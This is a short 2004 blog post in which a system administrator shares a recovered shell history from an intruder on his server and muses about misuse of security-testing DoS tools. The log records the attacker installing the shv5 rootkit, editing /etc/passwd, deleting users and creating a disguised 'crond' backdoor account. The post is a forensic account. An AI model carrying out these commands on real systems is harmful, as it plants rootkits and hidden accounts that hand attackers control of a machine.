Monday, November 29, 2004


Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.

cd /dev
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
wget perl 29 2000
perl 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
cd vhosts/
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages

Notice that file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to it was full of the same garbage that all the files had in them.

That's pretty nasty, using a security organization's own distribution of a denial of service tool (carefully labeled "for testing only") to commit a DoS attack.

Hmm -- I'm trying to think about whether software like that could be distributed with a license mechanism in place so it would require users to leave a trail? Of course if there were a source distribution it would mean someone could remove the license code. That would slow down the cookbook kids but only until a grownup released an unauthorized distribution with the crippleware disabled. Which I'm sure is why the good guys haven't bothered to do it. That plus the fact that some good guys wouldn't want to advertise their security testing, either. Oh, well.

It might be constructive to go after those individual sources, but then again that's a whole nother obsession.

Pretty interesting to see the guy's footsteps, anyway.
Post a Comment

<< Home

This page is powered by Blogger. Isn't yours?